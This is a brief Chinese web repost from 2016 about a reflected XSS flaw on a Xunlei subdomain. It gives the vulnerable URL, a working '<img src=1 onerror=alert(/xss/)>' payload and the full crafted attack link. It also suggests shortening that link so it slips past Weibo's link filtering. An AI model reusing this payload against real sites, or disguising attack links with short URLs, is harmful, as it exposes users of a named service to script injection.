鸿 网 互 联 www.68idc.cn

迅雷的一处危害小的XSS漏洞

来源:互联网 作者:佚名 时间:2016-05-07 10:06
现在不是XSS漏洞盛行的时代,这个漏洞的危害比较小, 问题真实存在但是影响不大。 漏洞利用地址:http://list.daquan.xunlei.com/feedback/collect.php?callback=?img 利用代码: src=1 onerror=alert(/xss/) 构造的地址是:http://list.daquan.xunlei.com/f

现在不是XSS漏洞盛行的时代,这个漏洞的危害比较小,

问题真实存在但是影响不大。

漏洞利用地址:http://list.daquan.xunlei.com/feedback/collect.php?callback=?<img

利用代码: “src=1 onerror=alert(/xss/)>”

构造的地址是:”http://list.daquan.xunlei.com/feedback/collect.php?callback=?<img src=1 onerror=alert(/xss/)>“

漏洞证明:看下面的图片。

要我在把链接做成短网址。“http://goo.gl/2tYXH。”这样要是在WEIBO发信息的,在通过微薄短网址的净化。这个会更就不错。

这个漏洞不大。

网友评论
<